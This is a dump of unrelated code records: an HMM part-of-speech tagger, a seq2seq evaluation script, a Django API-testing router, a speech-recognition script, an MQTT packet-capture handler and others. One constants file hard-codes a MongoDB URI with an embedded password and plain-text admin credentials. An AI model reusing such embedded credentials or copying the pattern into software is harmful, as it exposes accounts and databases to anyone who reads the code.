countTransitionFromAll(self,condition_tags,next_tag):\n\t\tresult = 0 \n\t\tfor sentence in self.sentences:\n\t\t\tresult += sentence.countTransitionInSentence(condition_tags,next_tag)\n\t\treturn result\n\n\t\"\"\" menghitung jumlah tag target_tag di semua sentence \"\"\"\n\tdef countTagFromAll(self,target_tag,word_filter=None):\n\t\tresult = 0\n\t\tfor sentence in self.sentences:\n\t\t\tif word_filter == None:\n\t\t\t\tresult += sentence.countTagInSentence(target_tag)\n\t\t\telse:\n\t\t\t\tresult += sentence.countTagInSentence(target_tag,word_filter)\t\t\t\t\n\t\treturn result\n\n\tdef tambah(self,*sentence):\n\t\tself.sentences.append(sentence)\n\t\tpass\n\n\tdef reloadUniqueTagsNWords(self):\n\t\tfor sentence in self.sentences:\n\t\t\tfor word in sentence.words:\n\t\t\t\tself.uniqueTags.add(word.tag)\n\t\t\t\tself.uniqueWords.add(word.syntax)\n\t\tpass\n\n\tdef 
addUnknownWord(self,sentences):\n\t\tfor sentence in sentences:\n\t\t\tfor word in sentence.words:\n\t\t\t\tself.uniqueWords.add(word.syntax)\n\t\tpass\n\n\tdef getPermute(self, set_of_item, length):\n\t\treturn itertools.product(set_of_item, repeat=length)\n\n\tdef printSentences(self):\n\t\tfor sentence in self.sentences:\n\t\t\tprint(sentence.getSentence())\n\nclass Viterbi:\n\tTAG_SEQUENCE = 0\n\tPROBABILITY = 1\n\n\tdef __init__(self,startingTransitionTable,transitionTable,emissionTable,ngram):\n\t\tself.startingTransitionTable = startingTransitionTable\n\t\tself.transitionTable = transitionTable\n\t\tself.emissionTable = emissionTable\n\t\tself.viterbiTable = {}\n\t\tself.ngram = ngram\n\n\tdef generateViterbiSequence(self, testing_sentence):\n\t\tcummulative_word=[]\n\t\taltered_testing_words = self.alterIdenticWordNSplit(testing_sentence)\n\t\tngram_addition = self.ngram-1\n\t\tuniqueTags = self.emissionTable.keys()\n\t\tfor word in altered_testing_words:\n\t\t\tcummulative_word.append(word)\n\t\t\tfor tag in self.getViterbiPermute(uniqueTags,altered_testing_words,len(cummulative_word)):\n\t\t\t\tprint(\"P(\"+\",\".join(tag)+\"|\"+\" \".join(cummulative_word)+\") = \"),\n\t\t\t\tprobResult = self.calculateViterbiConditional(tag,cummulative_word)\n\t\t\t\tself.insertToTable(tag[-ngram_addition:],word,tag,probResult)\n\t\tprint(\"final table==============\")\n\t\tprint(\"input : \"+\" \".join(altered_testing_words))\n\t\tpprint.pprint(self.viterbiTable)\n\n\tdef calculateViterbiConditional(self,tag_sequence,word_sequence):\n\t\t# tambah start state sesuai jumlah ngram\n\t\tstarting_state = []\n\t\tresult = None;\n\t\tngram_addition = self.ngram-1;\n\t\tfor ii in list(range(0,ngram_addition)):\n\t\t\tstarting_state.append(\"s\")\n\t\ttag_sequence = starting_state+list(tag_sequence)\n\t\tfor idx,tag in enumerate(word_sequence):\n\t\t\tprint(\"P(\"+tag_sequence[idx+ngram_addition]+\"|\"+\"\".join(tag_sequence[idx:idx+ngram_addition])+\")\"),\n\t\t\tprint(\"P(\"+word_sequence[idx]+\"|\"+tag_sequence[idx+ngram_addition]+\") = \"),\n\t\t\ta = self.lookUpTransitionTable(tag_sequence[idx+ngram_addition],tag_sequence[idx:idx+ngram_addition])\n\t\t\t# print(a),\n\t\t\tprint(\" * \"),\n\t\t\tb = self.lookUpEmissionTable(word_sequence[idx],tag_sequence[idx+ngram_addition])\n\t\t\t# print(b),\n\t\t\t# print(\" = \"+str(a*b)),\n\t\t\tif result == None :\n\t\t\t\tresult = a*b \n\t\t\telse:\n\t\t\t\tresult *= (a*b)\n\t\tprint(\"|||| \"+str(result))\n\t\t# print \n\t\treturn result\n\n\tdef lookUpTransitionTable(self,next_tag,current_tag):\n\t\tNOMINATOR = 0\n\t\tDENOMINATOR = 0\n\t\tcurrent_tag = tuple(current_tag)\n\t\tif 's' in current_tag:\n\t\t\ttableEntry = self.startingTransitionTable[current_tag][next_tag]\n\t\telse:\n\t\t\ttableEntry = self.transitionTable[current_tag][next_tag]\n\t\tif tableEntry[DENOMINATOR] == 0:\n\t\t\treturn 0\n\t\treturn tableEntry[NOMINATOR]/tableEntry[DENOMINATOR]\n\t\n\tdef lookUpEmissionTable(self,word,tag):\n\t\tword = [char for char in word if char != \"#\"]\n\t\tword= \"\".join(word)\n\t\tif tag in self.emissionTable and word in self.emissionTable[tag]:\n\t\t\treturn self.emissionTable[tag][word][0]/self.emissionTable[tag][word][1]\n\t\treturn 0\n\t\n\tdef insertToTable(self,last_tag,word,tag,probResult):\n\t\tif word not in self.viterbiTable: \n\t\t\tself.viterbiTable[word] = {last_tag:(tag,probResult)};\n\t\t\n\t\tif last_tag not in self.viterbiTable[word]:\n\t\t\tself.viterbiTable[word][last_tag] = (tag,probResult)\n\n\t\tif probResult > 
self.viterbiTable[word][last_tag][self.PROBABILITY]:\n\t\t\tself.viterbiTable[word][last_tag] = (tag,probResult)\n\n\n\tdef getViterbiPermute(self, set_of_unique_tag ,testing_words, col_number):\n\t\tprint(\"\")\n\t\tif col_number <= self.ngram+3: # ini yg asli -> # col_number <= self.ngram:\n\t\t\treturn itertools.product(set_of_unique_tag , repeat=col_number)\n\t\telse :\n\t\t\treturn self.getPermuteWithLookMax(set_of_unique_tag, testing_words, col_number)\n\n\t\t## mendapatkan permutasi semua tag max di kolom sebelumnya dengan set_of_unique_tag\n\t\t# contoh: jika sedang menghitung col 2\n\t\t#col 1 | col 2 | col 3 | \t\t\tcoolToLook = word 1\n\t\t#-------------------------- \t\t\n\t\t#word 1 | word 2 | word 3 |\n\t\t#--------------------------\n\t\t# NN | | |\n\t\t# NV | | |\n\t\t# NO | | |\n\t\t# \n\tdef getPermuteWithLookMax(self,set_of_unique_tag, testing_words, col_number):\n\t\tpermutationItem = []\n\t\tprevColKey = testing_words[col_number-2]\n\t\tfor tag in self.viterbiTable[prevColKey]:\n\t\t\tpermutationItem.append(self.viterbiTable[prevColKey][tag][self.TAG_SEQUENCE])\n\t\tpermutationResult = []\n\t\tfor maxTagInPrevCol in permutationItem: # setiap entry max dari setiap kelas di kolom sebelumnya\n\t\t\tfor uniqueTag in set_of_unique_tag: # akan dicross dengan tag unik\n\t\t\t\tresultItem = []\n\t\t\t\tfor ii in list(range(0,col_number-1)): # melakukan unwrap karena di kolom sebelumnya berbentuk tuple\n\t\t\t\t\tresultItem.append(maxTagInPrevCol[ii])\n\t\t\t\tresultItem.append(uniqueTag)\n\t\t\t\tpermutationResult.append(tuple(resultItem))\n\t\treturn permutationResult\n\n\tdef alterIdenticWordNSplit(self,sentence):\n\t\tusedWord=[]\n\t\tfor word in sentence.split(\" \"):\n\t\t\twhile word in usedWord:\n\t\t\t\tword +=\"#\"\n\t\t\tusedWord.append(word)\n\t\treturn usedWord\n\n\tdef printLastResult(self):\n\t\tPROB = 1\n\t\tSEQ = 0\n\t\tlast_max_sequence = []\n\t\tfor column in self.viterbiTable:\n\t\t\tmaxProb = 0\n\t\t\tmaxSequence = []\n\t\t\tfor row in self.viterbiTable[column]:\n\t\t\t\tif self.viterbiTable[column][row][PROB] > maxProb:\n\t\t\t\t\tmaxProb = self.viterbiTable[column][row][PROB]\n\t\t\t\t\tmaxSequence = self.viterbiTable[column][row][SEQ]\n\t\t\tif len(maxSequence) > len(last_max_sequence):\n\t\t\t\tlast_max_sequence = maxSequence\n\t\tprint(\"max sequence : \")\n\t\tpprint.pprint(last_max_sequence)\n\n\n# sen1 = Sentence(Word(\"setiap\",\"XX\"), Word(\"masalah\",\"BD\"), Word(\"ada\",\"XX\"), Word(\"jalan\",\"BD\"), Word(\"keluar\",\"BD\"))\n# sen2 = Sentence(Word(\"tinggi\",\"SF\"), Word(\"gunung\",\"BD\"), Word(\"bisa\",\"XX\"), Word(\"didaki\",\"KR\"))\n# sen3 = Sentence(Word(\"jalan\",\"KR\"), Word(\"kaki\",\"XX\"), Word(\"setiap\",\"XX\"), Word(\"hari\",\"BD\"), Word(\"bisa\",\"XX\"), Word(\"menyembuhkan\",\"KR\"), Word(\"osteoporosis\",\"BD\"))\n# sen4 = Sentence(Word(\"dua\",\"XX\"), Word(\"pebalap\",\"BD\"), Word(\"tinggi\",\"SF\"), Word(\"hati\",\"SF\"), Word(\"itu\",\"XX\"), Word(\"keracunan\",\"KR\"), Word(\"bisa\",\"BD\"))\n# sen5 = Sentence(Word(\"pembangunan\",\"BD\"), Word(\"jalan\",\"BD\"), Word(\"di\",\"XX\"), Word(\"kaki\",\"XX\"), Word(\"gunung\",\"BD\"), Word(\"sudah\",\"XX\"), Word(\"jalan\",\"XX\"), Word(\"dua\",\"XX\"), Word(\"hari\",\"XX\"))\n# sen6 = Sentence(Word(\"jalan\",\"BD\"), Word(\"terjal\",\"SF\"), Word(\"dan\",\"XX\"), Word(\"tanjakan\",\"BD\"), Word(\"tinggi\",\"SF\"), Word(\"bisa\",\"XX\"), Word(\"menjadi\",\"XX\"), Word(\"masalah\",\"BD\"), Word(\"bagi\",\"XX\"), Word(\"setiap\",\"XX\"), 
Word(\"pebalap\",\"BD\"))\n\nsen1 = Sentence(Word(\"aku\",\"A\"), Word(\"sedang\",\"A\"), Word(\"main\",\"A\"), Word(\"bola\",\"B\"), Word(\"nasi\",\"A\"))\nsen2 = Sentence(Word(\"mereka\",\"B\"), Word(\"sedang\",\"B\"), Word(\"makan\",\"B\"), Word(\"buah\",\"A\"))\nsen3 = Sentence(Word(\"kami\",\"B\"), Word(\"dengan\",\"A\"), Word(\"dia\",\"B\"), Word(\"bersama\",\"A\"))\nsen4 = Sentence(Word(\"makan\",\"A\"), Word(\"sendok\",\"B\"), Word(\"dijual\",\"B\"), Word(\"murah\",\"A\"))\nmodel = HMM_Model(sen1,sen2,sen3,sen4)\n# model = HMM_Model(sen1,sen2,sen3,sen4,sen5,sen6)\n# sen1 = Sentence(Word(\"setiap\",\"N\"), Word(\"masalah\",\"O\"), Word(\"ada\",\"V\"))\n# model = HMM_Model(sen1)\n\nmodel.printSentences()\n\n# print(model.countTagFromAll(\"XX\"))\n# print(model.countTagFromAll(\"XX\",\"setiap\"))\n\n# print(model.countTransitionFromAll([\"XX\",\"BD\"],\"XX\"))\n# print(model.countTransitionFromAll([\"XX\",\"BD\"],\"*\"))\n\n\n# print(model.calculateEmissionProb(\"bisa\",\"BD\"))\n# print(model.calculateTransitionProb([\"XX\",\"BD\"],\"XX\"))\n\n# model.addUnknownWord([sen5,sen6])\nngram = 2 # 2 = bigram\n\nemissionTable = model.generateEmissionTable();\nprint(\"Emission Table : \")\npprint.pprint(emissionTable)\n\n\nmodel.smoothing(emissionTable)\nprint(\"Smoothed Emission Table : \")\npprint.pprint(emissionTable)\n\n\nprint(\"Transition Table : \")\ntransitionTable = model.generateTransitionTable(ngram);\npprint.pprint(transitionTable)\n\nprint(\"Starting Transition Table : \")\nstartingTransitionTable = model.generateStartingTransitionTable(ngram);\npprint.pprint(startingTransitionTable)\n\n\nprint(\"Viterbi Table : \")\nvi = Viterbi(startingTransitionTable, transitionTable,emissionTable,ngram)\n# vi.generateViterbiSequence('pembangunan jalan di kaki gunung sudah jalan dua hari')\n# vi.generateViterbiSequence('jalan terjal dan tanjakan tinggi bisa menjadi masalah bagi setiap pebalap')\n# vi.generateViterbiSequence('tinggi')\nvi.generateViterbiSequence(\"aku makan nasi dengan sendok\")\nprint(\"result : \")\nvi.printLastResult();\n","sub_path":"my_lab/nlp/ws2/hmm-tagger.py","file_name":"hmm-tagger.py","file_ext":"py","file_size_in_byte":13816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"179998924","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, print_function, division\n\nimport random\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch import optim\nimport torch.nn.functional as F\n\n\nfrom encoder import EncoderRNN\nfrom decoder import *\n\n\nhidden_size = 200 \n#from dataset.translation import * # 这样很不好,要么train之后给save下来\nfrom dataset.snli import *\n\n# get test set\n\n\n\n\n######################################################################\n# Load Model\n# =================\n\n\n\n\n\n######################################################################\n# Plotting results\n# ----------------\n\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg') # 为什么新添加这一行?\nimport matplotlib.ticker as ticker\nimport numpy as np\n\n\n\ndef showPlot(points, points2=None):\n plt.figure()\n fig, ax = plt.subplots()\n # this locator puts ticks at regular intervals\n loc = ticker.MultipleLocator(base=0.2)\n ax.yaxis.set_major_locator(loc)\n plt.plot(points)\n if(points2):\n plt.plot(points2)\n plt.legend(['train-loss', 'test-loss'], loc='upper left')\n plt.savefig('loss.jpg')\n\n\n\ndef evaluate(encoder, decoder, sentence, input_lang, output_lang, 
max_length=MAX_LENGTH, target_sentence=None, criterion=None):\n if(target_sentence): \n target_tensor = tensorFromSentence(output_lang, target_sentence)\n\n with torch.no_grad():\n input_tensor = tensorFromSentence(input_lang, sentence)\n input_length = input_tensor.size()[0]\n encoder_hidden = encoder.initHidden()\n encoder_outputs = torch.zeros(max_length, encoder.hidden_size, device=device)\n\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(input_tensor[ei],\n encoder_hidden)\n encoder_outputs[ei] += encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=device) # SOS\n\n decoder_hidden = encoder_hidden\n\n decoded_words = []\n decoder_attentions = torch.zeros(max_length, max_length)\n\n loss = 0\n num_loss = 0\n\n for di in range(max_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs)\n decoder_attentions[di] = decoder_attention.data\n topv, topi = decoder_output.data.topk(1)\n\n if(target_sentence and di < len(target_tensor)):\n loss += criterion(decoder_output, target_tensor[di])\n num_loss += 1\n if topi.item() == EOS_token:\n decoded_words.append('')\n break\n else:\n decoded_words.append(output_lang.index2word[topi.item()])\n\n decoder_input = topi.squeeze().detach()\n if(target_sentence):\n return decoded_words, decoder_attentions[:di + 1], loss.item() / num_loss\n else:\n return decoded_words, decoder_attentions[:di + 1]\n\n\n\n######################################################################\n# We can also evaluate on the test set\n\ndef evaluateSet(encoder, decoder, eval_set, input_lang, output_lang, criterion):\n loss_total = 0\n for i in range(len(eval_set)):\n pair = eval_set[i]\n output_words, attentions, loss = evaluate(encoder, decoder, pair[0], \n input_lang, output_lang, target_sentence=pair[1], criterion=criterion)\n loss_total += loss\n return loss_total/len(eval_set)\n\n\n\n\n######################################################################\n# We can evaluate random sentences from the training set and print out the\n# input, target, and output to make some subjective quality judgements:\n#\n\ndef evaluateRandomly(encoder, decoder, eval_set, input_lang, output_lang, n=10):\n for i in range(n):\n pair = random.choice(eval_set)\n print('>', pair[0])\n print('=', pair[1])\n output_words, attentions = evaluate(encoder, decoder, pair[0], input_lang, output_lang)\n output_sentence = ' '.join(output_words)\n print('<', output_sentence)\n print('')\n\n\n\n\n\n######################################################################\n# Visualizing Attention\n# ---------------------\n\ndef showAttention(input_sentence, output_words, attentions):\n # Set up figure with colorbar\n fig = plt.figure()\n ax = fig.add_subplot(111)\n cax = ax.matshow(attentions.numpy(), cmap='bone')\n fig.colorbar(cax)\n\n # Set up axes\n ax.set_xticklabels([''] + input_sentence.split(' ') +\n [''], rotation=90)\n ax.set_yticklabels([''] + output_words)\n\n # Show label at every tick\n ax.xaxis.set_major_locator(ticker.MultipleLocator(1))\n ax.yaxis.set_major_locator(ticker.MultipleLocator(1))\n plt.savefig('attention.jpg')\n #plt.show()\n\n\ndef evaluateAndShowAttention(encoder1, attn_decoder1, input_lang, output_lang, input_sentence, showAttn=True):\n output_words, attentions = evaluate(\n encoder1, attn_decoder1, input_sentence, input_lang, output_lang)\n print('input =', input_sentence)\n print('output =', ' '.join(output_words))\n if showAttn:\n 
showAttention(input_sentence, output_words, attentions)\n\n\n\n\n\n\n######################################################################\n# Evaluation\n# =======================\n\ndef eval():\n\n # 或者在train.py中import进来\n input_lang = torch.load('model/input_lang')\n output_lang = torch.load('model/output_lang')\n eval_set = torch.load('model/test_set')\n\n encoder1 = EncoderRNN(input_lang.n_words, hidden_size).to(device)\n attn_decoder1 = AttnDecoderRNN(hidden_size, output_lang.n_words, MAX_LENGTH, dropout_p=0.1).to(device)\n\n encoder1.load_state_dict(torch.load('model/encoder'))\n attn_decoder1.load_state_dict(torch.load('model/decoder'))\n\n\n evaluateRandomly(encoder1, attn_decoder1, eval_set, input_lang, output_lang)\n evaluateAndShowAttention(encoder1, attn_decoder1, input_lang, output_lang, random.choice(eval_set)[0])\n\n try:\n while True:\n in_text = input(\"input \" + input_lang.name + \": press ctrl+c to exit\\n\")\n evaluateAndShowAttention(in_text, False)\n except KeyboardInterrupt:\n pass\n\nif __name__ == '__main__':\n eval()\n print(\"Done\")\n#evaluateAndShowAttention(\"elle a cinq ans de moins que moi .\")\n\n#evaluateAndShowAttention(\"elle est trop petit .\")\n\n#evaluateAndShowAttention(\"je ne crains pas de mourir .\")\n\n#evaluateAndShowAttention(\"c est un jeune directeur plein de talent .\")","sub_path":"snli/multitask_snli_eval.py","file_name":"multitask_snli_eval.py","file_ext":"py","file_size_in_byte":6629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"209245379","text":"\"\"\"\n Static variables (consts) to be used in the API (both internally & externally)\n\"\"\"\nSTATE_INFO = {\n 'ACT' : {'region_id' : '01', 'full_name' : 'Australian Capital Territory', 'is_state' : True},\n 'NSW' : {'region_id' : '02', 'full_name' : 'New South Wales', 'is_state' : True},\n 'VIC' : {'region_id' : '03', 'full_name' : 'Victoria', 'is_state' : True},\n 'QLD' : {'region_id' : '04', 'full_name' : 'Queensland', 'is_state' : True},\n 'SA' : {'region_id' : '05', 'full_name' : 'South Australia', 'is_state' : True},\n 'WA' : {'region_id' : '06', 'full_name' : 'Western Australia', 'is_state' : True},\n 'TAS' : {'region_id' : '07', 'full_name' : 'Tasmania', 'is_state' : True},\n 'NT' : {'region_id' : '08', 'full_name' : 'Northern Territory', 'is_state' : True},\n}\nAUS_INFO = {'AUS' : {'region_id' : '00', 'long_name' : 'Australia', 'is_state' : False}}\nREGIONS_INFO = {**AUS_INFO, **STATE_INFO}\n\nSTATE_NAMES = list(STATE_INFO.keys())\nREGION_NAMES = list(REGIONS_INFO.keys())\n\nAGE_BANDS = ['0-4', '5-9', '10-14', '15-19', '20-24', '25-29',\n '30-34', '35-39', '40-44', '45-49', '50-54','55-59', '60-64',\n '65-69', '70-74', '75-79', '80-84', '85 and over']\n\n\nPREDICTION_RANGE = (2019, 3019)\n\nMDB_HOST = \"mongodb://admin:9321admin@ds131763.mlab.com:31763/9321-ass-3\"\nMDB_COL_TOKENS = \"tokens\"\n\nADMIN_USER = 'admin'\nADMIN_PASS = 'admin123'\n","sub_path":"COMP9321-ass-3-master/back_end/static.py","file_name":"static.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"346987972","text":"\n\n#calss header\nclass _GANGRENE():\n\tdef __init__(self,): \n\t\tself.name = \"GANGRENE\"\n\t\tself.definitions = [u\"the decay of a part of a person's body because the blood has stopped flowing there: \"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 
'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_gangrene.py","file_name":"_gangrene.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"513213801","text":"def newname():\n\tfor i in range(25):\n\t\tyield chr(65+i) + 'a'\n\t\tyield chr(65+i) + 'b'\na = input().split()\nn = int(a[0])\nk = int(a[1])\ns = input().split()\nlast = False\nnew = newname()\nab = next(new)\nlis = [ab]\nremember = ab\n# did not think it through, have to put all the operation at the first index\n# and then replenish the rest at the end\nfor i in s:\n\tif i == \"NO\":\n\t\tif not last:\n\t\t\tlis.append(remember)\n\t\telse:\n\t\t\tlast = False\n\t\t\tlis.append(remember)\n\telif i == \"YES\":\n\t\tif not last:\n\t\t\tfor j in range(k-1):\n\t\t\t\tab = next(new)\n\t\t\t\tlis.append(ab)\n\t\t\t\tremember = ab\n\t\t\t\tlast = True\n\t\telse:\n\t\t\tab = next(new)\n\t\t\tlis.append(ab)\n\t\t\tremember = ab\n\nfor i in range(n - len(lis)):\n\tab = next(new)\n\tlis.append(ab)\nprint(' '.join(lis))","sub_path":"Codeforces/405d2C.py","file_name":"405d2C.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"230426248","text":"import os\nfrom time import gmtime, strftime\nfrom pocketsphinx import LiveSpeech\n\n#dictionary\n'''\nturn on \nturn off\nrecognize face\nis there\nhuman \non the screen\ngo youtube\nhow are you\ncomputer\n'''\n\nclass AcousticModel:\n def __init__(self, model_path, model_hmm_path):\n self.model_path = model_path\n self.model_hmm_path = model_hmm_path\n\n self.SAMPLING_RATE = 16000\n self.BUFFER_SIZE = 2048\n\n config = LiveSpeech(\n verbose=False,\n sampling_rate=16000,\n buffer_size=2048,\n no_search=False,\n full_utt=False,\n hmm=os.path.join(model_hmm_path, 'en-us'),\n lm=os.path.join(model_path, '6856.lm'),\n dic=os.path.join(model_path, '6856.dic')\n )\n self.SPEECH = config\n self.words = []\n\n def run(self):\n print(\"Mice is listening...\\n\")\n for phrase in self.SPEECH:\n cur_time = strftime(\"%Y-%m-%d %H:%M:%S\", gmtime())\n split = [word for word in str(phrase).split()]\n record = (cur_time, split)\n self.words.append(record)\n print(\"\\nYou said:\" + str(phrase))\n print(\"All words in session: \" + str(self.words))\n\n\ndef main():\n model_hmm_path = \"/home/pawel/sphinxCMU/pocketsphinx/model/en-us\"\n model_path = \"/home/pawel/Desktop/acoustic model/\"\n model = AcousticModel(model_path, model_hmm_path)\n model.run()\n\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"pocket_sphinx(speech rec)/acoustic_model_2.py","file_name":"acoustic_model_2.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"643240643","text":"from django.conf.urls import url\n# from .view_basic import *\nfrom api.view_api import *\nfrom api.view_project_and_group import *\nfrom api.view_case import *\nfrom api.view_send_req import *\nfrom api.view_test_report import *\nfrom api.view_other_fun import *\nfrom api.view_global_env import *\nfrom api.view_test_task import *\nfrom api.view_report_receive_config import *\nfrom api.reprot_form import get_report_form_list, rf_verify, get_rf_result_list, get_rf_result_detail\n\n\nurlpatterns = [\n # 自测用的接口\n url(r\"^test\", test),\n\n # 项目部分\n url(r'^get_all_project$', get_all_project), # 取所有项目数据\n 
url(r\"^add_project$\", add_project),\n    url(r\"^delete_project$\", delete_project),\n    url(r\"^update_project$\", update_project),\n\n    # 分组部分\n    url(r'^get_all_group$', get_all_group), # 获取某项目下所有分组数据\n    url(r\"^add_group$\", add_group),\n    url(r\"^delete_group$\", delete_group),\n    url(r\"^update_group$\", update_group),\n\n    # 接口部分\n    url(r'^get_api_list$', get_api_list),\n    url(r\"^add_api$\", add_api),\n    url(r\"^delete_api$\", delete_api),\n    url(r\"^update_api$\", update_api),\n\n    # 用例部分\n    url(r\"^get_case_data$\", get_case_data), # 获取某个case的数据\n    url(r\"^get_case_list$\", get_case_list), # 获取某个接口下的所有用例\n    url(r\"^save_case$\", save_case),\n    url(r\"^delete_case$\", delete_case),\n    url(r\"^update_case$\", update_case),\n\n    # 全局配置\n    url(r'^get_global_host$', get_global_host),\n    url(r'^get_global_variable$', get_global_variable),\n    url(r'^get_global_header$', get_global_header),\n    url(r'^get_global_cookie$', get_global_cookie),\n    url(r'^get_global_env$', get_global_env),\n\n    # 接收报告配置\n    url(r'^get_workwx_user_group', get_workwx_user_group),\n    url(r'^get_workwx_group_chat', get_workwx_group_chat),\n    url(r'^get_email_user_group', get_email_user_group),\n\n    # 页面接口请求\n    url(r'^send_req$', send_req),\n\n    # 其他功能部分\n    url(r\"^switch_json$\", switch_json), # kv格式转换成json格式\n    url(r\"^switch_kv$\", switch_kv), # json格式转换成kv格式\n    url(r\"^F12_p_to_json$\", F12_p_to_json), # F12的请求参数转换json\n    url(r\"^excel_json_auto_switch$\", excel_json_auto_switch), # excel格式和json格式智能转换\n    url(r\"^add_sign\", add_sign), # 添加当前时间戳\n\n    # 测试任务\n    url(r\"^get_test_task_list$\", get_test_task_list),\n    url(r\"^get_test_task_detail\", get_test_task_detail),\n    url(r\"^add_test_task$\", add_test_task),\n    url(r\"^update_test_task$\", update_test_task),\n    url(r\"^delete_test_task$\", delete_test_task),\n    url(r\"^execute_task_now$\", execute_task_now),\n    # url(r\"^start_cron_program$\", start_cron_program),\n    # url(r\"^pause_cron_program$\", pause_cron_program),\n    # url(r\"^resume_cron_program$\", resume_cron_program),\n    # url(r\"^stop_cron_program$\", stop_cron_program),\n    url(r\"^start_cron_task$\", start_cron_task), # 开始定时任务\n    url(r\"^stop_cron_task$\", stop_cron_task), # 停止定时任务\n    url(r\"^get_cron_info$\", get_cron_info), # 获取指定任务或所有任务的下次执行时间\n\n    # 测试任务组\n    url(r\"^get_task_group_list$\", get_task_group_list),\n    url(r\"^get_task_group_detail\", get_task_group_detail),\n    url(r\"^add_task_group$\", add_task_group),\n    url(r\"^update_task_group$\", update_task_group),\n    url(r\"^delete_task_group$\", delete_task_group),\n    url(r\"^execute_task_group_now$\", execute_task_group_now),\n    url(r\"^start_cron_task_group$\", start_cron_task_group),\n    url(r\"^stop_cron_task_group$\", stop_cron_task_group),\n\n    # 测试报告\n    url(r\"^get_report_list$\", get_report_list),\n    url(r\"^get_report_data$\", get_report_data),\n    url(r\"^get_case_detail$\", get_case_detail), # 获取用例详情数据,全量测试情况下\n    url(r\"^get_all_report$\", get_all_report), # 获取全部报告数据\n\n    # 统计部分\n    url(r\"^staticitem_project$\", staticitem_project), # 按项目统计\n    url(r\"^staticitem_task$\", staticitem_task), # 按任务统计\n    url(r\"^staticitem_recent$\", staticitem_recent), # 按最近执行情况统计\n    url(r\"^staticitem_user$\", staticitem_user), # 按用户统计(最近七周每人新增用例数量\n    url(r\"^staticitem_user2$\", staticitem_user2), # 按用户统计(每个人新增的全部用例数量\n\n    # 报表自动化\n    url(r\"^get_report_form_list$\", get_report_form_list),\n    url(r\"^get_rf_result_list$\", get_rf_result_list),\n    url(r\"^get_rf_result_detail$\", get_rf_result_detail),\n    url(r\"^rf_verify$\", rf_verify), # 测试单个报表\n\n    url(r\"^upload_case$\", upload_case), # 上传用例\n    # 下载接口用例数据 
dl_api_case_data:数据处理判断,结果为true通过触发a标签直接请求文件\n url(r\"^dl_api$\", dl_api),\n url(r\"^download_group$\", download_group),\n\n url(r\"^download/(.*)\", download), # 下载文件\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"113654450","text":"'''\r\nCreated on 07.10.2016\r\n\r\n@author: ThinkPad User\r\n'''\r\n\r\nimport paho.mqtt.client as mqtt\r\nimport ConfigParser\r\nimport datetime\r\nimport pyshark\r\nimport extract_data\r\nimport logging\r\nimport time\r\nimport sys\r\n\r\nclass MqttHandler(object):\r\n def __init__(self, iniFilePath):\r\n self.logger = logging.getLogger()\r\n self.logger.info(\"MqttHandler::__init__: Got iniFilePath=\" + repr(iniFilePath))\r\n #ini file parsing\r\n conf = ConfigParser.ConfigParser()\r\n conf.read(iniFilePath)\r\n self.conf = conf\r\n self.logger.info(\"MqttHandler::__init__: Config read done\")\r\n \r\n #Connect to the capture program\r\n self.interfaceString = str(self.conf.get(\"Capture\",\"Interface\")).strip()\r\n self.bpfFilterString = \"ip host \" + str(self.conf.get(\"Capture\",\"ListenIp\")).strip()\r\n self.logger.info(\"MqttHandler::__init__: Listening on interface '\" + self.interfaceString + \"'\")\r\n self.logger.info(\"MqttHandler::__init__: Using bpf_filter string '\" + self.bpfFilterString + \"'\")\r\n# self.capture = pyshark.LiveCapture(self.interfaceString, bpf_filter=self.bpfFilterString)\r\n #TODO: If the line above is used it does obviously not work, why???\r\n self.capture = pyshark.LiveCapture(\"eth0\", bpf_filter=\"ip host 192.168.0.196\")\r\n self.logger.info(\"MqttHandler::__init__: Capture object init done\")\r\n\r\n #mqtt stuff\r\n self.mqtt_client = mqtt.Client()\r\n #client callback setup for incoming data\r\n self.mqtt_client.on_connect = self.__on_connect__\r\n self.mqtt_client.on_message = self.__on_message__\r\n self.mqtt_client.on_disconnect = self.__on_disconnect__\r\n self.logger.info(\"MqttHandler::__init__: Basic MQTT client setup done\")\r\n #finally connect the client\r\n try:\r\n user = conf.get(\"Mqtt\",\"Username\")\r\n passw = conf.get(\"Mqtt\",\"Password\")\r\n self.mqtt_client.username_pw_set(user, passw)\r\n self.logger.info(\"MqttHandler::__init__: MQTT client auth data setup done\")\r\n except:\r\n self.logger.info(\"MqttHandler::__init__: Error in MQTT client auth data setup has occured\")\r\n pass\r\n self.mqtt_connected = False\r\n self.logger.info(\"MqttHandler::__init__: Starting MQTT client connect\")\r\n self.mqtt_client.connect(host=conf.get(\"Mqtt\",\"Host\"), \r\n port=int(conf.get(\"Mqtt\",\"Port\")), \r\n keepalive=int(conf.get(\"Mqtt\",\"KeepAliveTime\")))\r\n self.logger.info(\"MqttHandler::__init__: MQTT client connection is established\")\r\n #Start a background thread that handles the data\r\n self.mqtt_client.loop_start()\r\n self.logger.info(\"MqttHandler::__init__: MQTT worker thread is started\")\r\n 